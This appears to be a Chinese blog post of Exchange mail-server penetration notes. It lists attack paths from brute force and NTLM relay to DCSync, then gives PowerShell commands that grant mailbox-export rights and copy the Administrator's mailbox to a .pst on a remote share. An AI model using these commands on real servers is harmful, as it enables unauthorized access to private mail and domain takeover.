Exchange邮件服务器渗透
攻击手法分析
1、无凭据:
- 爆破:利用401认证进行爆破
- 泄露内网信息:利用msf:auxiliary/scanner/http/owa_iis_internal_ip,泄露Exchange内网IP地址
- 配合钓鱼进行NTLM_Relay(工具:ExchangeRelayX)
- 利用CVE进行获取权限
2、有凭据:
- 导出邮箱列表
- Exchange Rce漏洞
- Exchange SSRF 进行NTLM_Relay
- 使用Hash、密码操作EWS接口
- 攻击Outlook客户端:Outlook提供了一项“规则和通知”(Rules and Alerts)的功能,可以设置邮件接收和发送的策略,分为规则条件和动作,即用户定义当邮件满足某些条件时(如邮件主题包含特定词语),触发一个特定的动作,这个动作可以是对邮件的管理、处置,甚至是启动应用程序。
- 从Exchange到域管:writeACL DCsync
3、常用命令
#在Exchange Management Shell下执行Get-Mailbox //获取数据库名
Get-MailboxDatabase //获取数据库存储位置
Get-Mailboxstatistics -identity administrator | select DisplayName,ItemCount,TotalItemSize,LastLogonTime //查看指定用户的邮箱使用信息
Get-ManagementRoleAssignment -role "Mailbox Import Export" //查看导出权限
Get-MailboxExportRequest //查看导出请求
Remove-MailboxExportRequest -Identity Administrator\mailboxexport //删除导出请求
New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export" //给指定用户添加导出权限
New-MailboxExportRequest -Mailbox Administrator -FilePath \\192.168.100.194\intepub\xx.pst //导出指定用户邮件
这里总结的不是很全,还请见谅,后续会继续整理。
Exchange邮件服务器渗透相关推荐
- exchange系列(四)如何保护exchange邮件服务器的安全
博主QQ:819594300 博客地址:http://zpf666.blog.51cto.com/ 有什么疑问的朋友可以联系博主,博主会帮你们解答,谢谢支持 理论部分: 邮件病毒的危害 窃取邮件内容 ...
- Exchange邮件服务器实现外部邮件的收发
实现邮件的外部收发<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> ...
- exchange邮件服务器_基于Spring Boot快速实现发送邮件功能
邮件在项目中经常会被用到,比如用邮件发送通知.比如,通过邮件注册.认证.找回密码.系统报警通知.报表信息等.本篇文章带大家通过SpringBoot快速实现一个发送邮件的功能. 邮件协议 下面先简单了解 ...
- Exchange邮件服务器安全
Exchange是由微软推出的用于企业环境中部署的邮件服务器.Exchange在逻辑上分为三个层次:网络层(network layer).目录层(directory layer).消息层(messag ...
- exchange系列(三)exchange邮件服务器的邮件传输管理
博主QQ:819594300 博客地址:http://zpf666.blog.51cto.com/ 有什么疑问的朋友可以联系博主,博主会帮你们解答,谢谢支持! 前言:我们前面安装好了exchange2 ...
- 搭建exchange邮件服务器一定要ad域么?_邮件伪造之SPF绕过的5种思路
SMTP(SimpleMail Transfer Protocol) 即简单邮件传输协议,正如名字所暗示的那样,它其实是一个非常简单的传输协议,无需身份认证,而且发件人的邮箱地址是可以由发信方任意声明 ...
- 企业Exchange邮件服务器搭建实例
一.案例背景: 因企业业务需求的不同,部分企业需要搭建自己的企业邮箱.搭建邮箱服务器又有多种方法,有时会将域控制器与邮件服务器部署到不同服务器,有时会将邮件服务与邮件数据库安装到多台服务器,企业越大对 ...
- 搭建exchange邮件服务器一定要ad域么?_域渗透神器-AD Explorer使用指南
Mark Russinovich的Sysinternals工具(微软)大家都听说过.多年来,它们一直是系统管理员喜欢的工具.我也很喜欢这款工具,但我更喜欢的是AD Explorer,我一直使用它进行内 ...
- EWS操作exchange邮件服务器收发邮件
参考资料: http://www.dotblogs.com.tw/wadehuang36/archive/2012/07/04/ews-first.aspx 本範例的主要功能是尋找未讀郵件並下載附件. ...
- Exchange 邮件服务器内存硬盘估算
转载于:https://www.cnblogs.com/workherd/p/6534596.html
最新文章
- iOS 三种类型的Block
- 数据挖掘算法_数据挖掘算法入门
- 如何将ipynb转换为html,md,pdf等格式
- struts1.3执行流程分析
- java反序列化后不相等_Jackson:使用不同的属性名称序列化/反序列化 - java
- u盘解密软件_企业都使用哪些数据防泄密软件
- windows10环境下node js版本快速升级
- 转:Web页面通过URL地址传递参数常见问题及检测方法
- ucGUI移植到ARM
- 推荐系统--MovieLens数据集
- 阿里巴巴上市路演ppt 官方完整版
- 小程序点击图片全屏播放视频
- android 通知 可横幅展示的哦
- 项目实战2 | 基于Swarm+Prometheus实现双VIP可监控Web高可用集群
- 云服务器和VPS有什么区别?
- “以电折水、水电共计”智能仪表助力农业灌溉走上新模式
- 什么是 infiniband
- 怎么搞的,从今天早上起,水木清华BBS就上不去了,郁闷中:(
- Github Star 7.2K,超级好用的OCR数据合成与半自动标注工具,强烈推荐!
- dma-buf 由浅入深(五) —— File